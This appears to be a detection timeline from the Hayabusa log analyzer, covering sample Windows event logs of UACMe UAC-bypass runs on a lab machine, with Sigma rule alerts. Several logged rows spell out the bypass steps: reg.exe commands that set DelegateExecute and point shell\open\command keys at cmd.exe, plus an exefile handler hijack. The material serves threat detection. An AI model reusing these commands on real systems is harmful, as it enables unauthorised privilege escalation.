2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
